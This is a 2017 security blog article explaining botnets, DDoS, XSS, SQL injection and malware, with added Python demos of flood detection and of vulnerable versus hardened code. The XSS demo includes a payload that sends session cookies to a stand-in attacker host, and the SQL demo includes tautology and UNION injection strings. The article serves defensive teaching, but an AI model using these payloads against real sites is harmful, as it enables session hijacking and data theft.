You’re a target, and you should know it: dealing with today’s four most prevalent web threats

11th December 2017

Not everyone washes their hands as often as they should. Disgusting, but true. As far as digital hygiene goes, it’s also true that not every computer user or administrator keeps up to date with software patches or uses layered defenses. This leaves lots of devices vulnerable to being hacked as well as being commandeered and added to a “botnet” - essentially the computer version of an undead horde from some zombie horror film. Except those zombies can gnaw on your flesh from across the globe by virtue of the Internet, and can be summoned in massive numbers within seconds.

Botnets: the swarm that can sting you

So really, they’re more like an army of killer robots. In fact, the term “botnet” is short for “robot network”. Botnets are swarms of compromised computers (and, increasingly, routers, cameras and other Internet-connected devices) running malware that takes orders from a command-and-control server operated by cybercriminals. That malware automates work which would otherwise take hours of manual typing at a keyboard: sending spam, scanning for and attacking other machines, or flooding a target with traffic. This automation puts the “robot” in “botnet”.

So what can the bad guys do with a botnet? For starters, they can unleash it to jam comment forums and email inboxes with spam. They can also point it at a specific website or a range of IP addresses, scanning every page and service for vulnerabilities which they can then exploit to reach sensitive data, which is in turn sold on the black market. Yet perhaps the most menacing threat from botnets is their ability to launch a specific type of crippling attack on targeted websites which uses their strength in numbers: the Distributed Denial of Service (DDoS) attack.

When data becomes a weapon: DDoS

DDoS attacks consist of a massive number of computers (that’s the “distributed” part) which send so much traffic to a targeted website that the attack traffic uses up all the bandwidth, memory or processing power of the server running the site. With the server maxed out dealing with the attack traffic, it is unable to serve legitimate requests from customers and other visitors (the “denial of service”).

There are actually three main types of DDoS attack. Volumetric attacks, as the name suggests, saturate the victim’s network bandwidth through the sheer volume of attack-generated traffic (many billions of bits per second). Protocol attacks instead abuse weaknesses in how network protocols are handled: a SYN flood, for example, fills the connection-state tables of firewalls, load balancers and the server’s own TCP stack with half-open connections until no new ones can be accepted. Lastly, application layer attacks target the web application itself rather than the network underneath it. A flood of HTTP requests for expensive pages such as search or login, or many slow connections that each hold a worker process open, exhausts the server’s CPU, memory or connection pool while looking much like ordinary traffic. Due to their more targeted nature, application layer DDoS attacks require far less traffic (and thus smaller botnets) than the other two types, and are correspondingly harder to tell apart from legitimate load.
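
To make that last point concrete, here is an added example (not code from the original article) of how an application layer flood shows up in an ordinary web server access log, and how little traffic it takes. The Python script below parses constructed combined-format log lines, counts requests per source IP to endpoints assumed to be expensive for the backend (the paths /search and /api/report are assumptions for illustration), and flags any source whose count inside a ten-second window exceeds a threshold. No bandwidth figures are involved; thirty search requests in six seconds from one address is enough to stand out.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined log format, as written by Apache and nginx. Only the fields we need are named.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoints whose handling is costly for the backend (a search query, a report that
# hits the database hard). These paths are assumptions for this example.
EXPENSIVE_PREFIXES = ("/search", "/api/report")


def _line(ip, second, path, user_agent):
    """Build one constructed log line at 10:00:<second> UTC on 11 Dec 2017."""
    return (f'{ip} - - [11/Dec/2017:10:00:{second:02d} +0000] "GET {path} HTTP/1.1" '
            f'200 5120 "-" "{user_agent}"')


# Constructed sample log (not real traffic):
#  - 10.0.0.5 fires 30 search requests in six seconds from a scripted client
#  - 192.0.2.10 browses products and runs an occasional search over a minute
#  - 198.51.100.7 fetches only static assets
SAMPLE_LOG = (
    [_line("10.0.0.5", s // 5, f"/search?q=term{s}", "python-requests/2.18.4") for s in range(30)]
    + [_line("192.0.2.10", s, "/search?q=shoes" if s % 15 == 0 else "/product/42", "Mozilla/5.0")
       for s in range(0, 60, 5)]
    + [_line("198.51.100.7", s, "/static/app.css", "Mozilla/5.0") for s in range(0, 40, 2)]
)


def parse_line(line):
    """Return (ip, datetime, path-without-query) or None if the line does not parse."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    path = m.group("path").split("?", 1)[0]
    return m.group("ip"), ts, path


def find_l7_flooders(lines, window_seconds=10, max_expensive=20):
    """Return {ip: peak_count} for sources that requested expensive endpoints more than
    max_expensive times inside any single window_seconds-wide time bucket."""
    counts = defaultdict(int)  # (ip, bucket) -> expensive requests in that bucket
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, ts, path = parsed
        if not path.startswith(EXPENSIVE_PREFIXES):
            continue
        bucket = int(ts.timestamp()) // window_seconds
        counts[(ip, bucket)] += 1
    flagged = {}
    for (ip, _bucket), n in counts.items():
        if n > max_expensive:
            flagged[ip] = max(flagged.get(ip, 0), n)
    return flagged


if __name__ == "__main__":
    for ip, peak in find_l7_flooders(SAMPLE_LOG).items():
        print(f"{ip}: {peak} expensive requests in one {10} s window")
```

Run as a script it prints only 10.0.0.5; the shopper who searches four times a minute never crosses the threshold. In production the same idea runs continuously, keys on more than the source address (a botnet spreads its requests across thousands of them), and feeds a rate limiter or the WAF rather than a printout.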

Your main defense against DDoS attacks is a filtering solution able to identify and block the attack traffic while letting legitimate traffic through. Although on-premises equipment can do such filtering, the sheer scale of traffic seen in real volumetric attacks, which can fill the victim’s own Internet links before any local filter sees a packet, almost always makes a cloud-based scrubbing service the better choice. While the bad guys have a few ways to make money from the ability to knock your site offline, such as extorting ransom payments or renting out their botnet to other cybercriminals, there are also a few ways they can line their pockets while your site is fully functional.

Code injection attacks

Cross-site scripting (XSS) attacks are one way. A perpetrator submits a malicious script through an input the site stores and later displays without encoding it, such as a comment or a profile field; the script then runs in the browser of every subsequent visitor to that page, with the site’s own privileges (this is stored XSS; in the reflected variant the script is carried in a crafted link and bounces off the site into the victim’s browser instead). When the script runs it can read the visitor’s session cookie and send it to the perpetrator, who replays that session to act as the visitor without ever needing their password, pilfering addresses and other personal information which can then be sold on the black market. A common tool for combating XSS threats is a web application firewall (WAF) from a vendor such as Incapsula, which can block recognisable XSS attempts at the injection stage, before the payload reaches your application. Treat it as a safety net rather than the fix: the application itself has to encode untrusted data on output, mark session cookies HttpOnly so scripts cannot read them, and ship a Content Security Policy so that an injected script is neither allowed to run nor to phone home.
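
Here is an added example (written for this article, not code from the original page or from any vendor) showing the vulnerable and hardened halves side by side. The attacker’s comment, the cookie name and the hostname attacker.example.invalid are constructed for illustration. A tiny stand-in for the browser’s HTML parser lists which elements each rendering would create, so you can see the difference between a comment that becomes a script element and one that is merely displayed.

```python
import html
from html.parser import HTMLParser

# Constructed attacker payload: a stored comment that, if rendered as markup, makes
# every later visitor's browser send document.cookie to the attacker. The hostname
# uses the reserved .invalid top-level domain so nothing here can resolve.
PAYLOAD = ('<script>new Image().src="https://attacker.example.invalid/c?"'
           '+document.cookie</script>')


def render_comment_vulnerable(comment: str) -> str:
    """'Before': untrusted text dropped straight into HTML. The browser cannot tell
    the commenter's <script> from the site's own markup."""
    return f'<div class="comment">{comment}</div>'


def render_comment_hardened(comment: str) -> str:
    """'After': contextual output encoding. Every <, >, &, ' and " becomes an entity,
    so the payload is displayed as text rather than parsed as a script element."""
    return f'<div class="comment">{html.escape(comment, quote=True)}</div>'


class _TagCollector(HTMLParser):
    """Minimal stand-in for the browser's parser: records the elements it would create."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_created(markup: str) -> list:
    """Elements a browser would build from this markup; a 'script' entry means code runs."""
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


def hardened_response_headers(session_id: str) -> dict:
    """Defence in depth for the day an encoding bug slips through. HttpOnly keeps the
    session cookie out of document.cookie, Secure keeps it off plaintext HTTP, and
    SameSite=Lax stops most cross-site requests from carrying it. The Content Security
    Policy refuses inline scripts and requests to foreign hosts, which defeats both
    halves of PAYLOAD: the script would not run, and the image beacon would not load.
    Cookie name and policy are assumptions for this example."""
    return {
        "Set-Cookie": f"session={session_id}; Path=/; Secure; HttpOnly; SameSite=Lax",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    }


if __name__ == "__main__":
    print("vulnerable ->", elements_created(render_comment_vulnerable(PAYLOAD)))
    print("hardened   ->", elements_created(render_comment_hardened(PAYLOAD)))
    print(render_comment_hardened(PAYLOAD))
```

html.escape is right for text placed between tags; data landing inside an attribute, a URL or a JavaScript string needs the encoding rules for that context, which is why template engines that escape by default are preferable to hand-rolled string formatting.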

Like XSS, SQL injection is a code injection attack: the attacker supplies input, typically through a form field or URL parameter, that the application pastes into a database query, so the database executes it as SQL instead of treating it as data. And, like XSS, WAFs are a popular tool for blocking it. There is one key difference though: whereas XSS attacks seek to steal individual visitors’ information, attackers who use SQL injection set their sights higher: personally identifiable information (PII) on every user account of the site, valuable and confidential intellectual property and other sensitive company data. The definitive fix is also different: parameterized queries, which keep data and SQL separate, backed by a database account for the web application that can reach only the tables and operations it actually needs.

This comprehensive haul is possible because the central SQL database behind a site like an ecommerce store is very often shared with, or integrated into, other company systems.
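
The following is an added example (not code from the original article) that runs the attack and the fix against a constructed in-memory SQLite table. The user records and the attacker inputs are made up for illustration. The first input turns the WHERE clause into a tautology and dumps every account; the second appends a UNION that reads the database’s own schema catalogue, which is the first step an attacker takes before walking outward to whatever else the database holds. The parameterized version returns nothing for either input.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory user table with sample data (not from any real system)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT, ssn TEXT)")
    conn.executemany(
        "INSERT INTO users (username, email, ssn) VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "000-00-0001"),
         ("bob", "bob@example.com", "000-00-0002"),
         ("carol", "carol@example.com", "000-00-0003")],
    )
    return conn


def lookup_vulnerable(conn, username: str) -> list:
    """'Before': the request parameter is pasted into the query text, so anything
    after a stray quote is executed as SQL."""
    query = f"SELECT username, email, ssn FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, username: str) -> list:
    """'After': the value is bound as a parameter; the database never parses it as SQL."""
    return conn.execute(
        "SELECT username, email, ssn FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker inputs. DUMP_ALL makes the WHERE clause always true.
# READ_SCHEMA appends a UNION against the schema catalogue (sqlite_master here,
# information_schema on most other engines); the trailing "--" comments out the
# closing quote that the vulnerable query adds after the input.
DUMP_ALL = "x' OR '1'='1"
READ_SCHEMA = "x' UNION SELECT name, sql, '' FROM sqlite_master --"


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable, DUMP_ALL    ->", lookup_vulnerable(conn, DUMP_ALL))
    print("vulnerable, READ_SCHEMA ->", lookup_vulnerable(conn, READ_SCHEMA))
    print("parameterized, DUMP_ALL ->", lookup_parameterized(conn, DUMP_ALL))
```

SQLite has no per-user grants, so the least-privilege half of the fix is not shown; on a server database the web application’s account should be unable to read tables it never needs (HR, finance, the schema catalogue) so that a query it does not control still cannot reach the rest of the company’s data.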

Breaking bad (code): malware

Lastly, there’s malware: the umbrella term which includes things like ransomware, worms, Trojans, and rootkits. These packages of pain can reach your web server if an administrator clicks a link in a legitimate-looking but fraudulent email through which the admin credentials are pilfered (i.e. phishing), through a worm that has spread to a machine connected to the server, through an unpatched vulnerability in the site’s own software, or any one of a dozen other methods.

Deploying a WAF in front of your server greatly decreases the likelihood that the web-borne routes will work, since it inspects every HTTP request and can block exploitation attempts against the site’s software as well as the upload of web shells and other malicious files. Be clear about its limits, though: on its own a WAF sees traffic to your web applications, not everything leaving your network, so spotting the command-and-control traffic of already-infected systems also needs egress filtering and network monitoring, and stolen administrator credentials are best neutralised by requiring multi-factor authentication on every administrative login.

All four of these threats can cause huge financial headaches for you and your customers, as well as costly damage to your brand’s reputation and lost customer trust. Don’t want to be the next Equifax? Then keep your systems patched (that breach began with a known web framework vulnerability whose fix had been available for months), and take a look at the aforementioned mitigating solutions.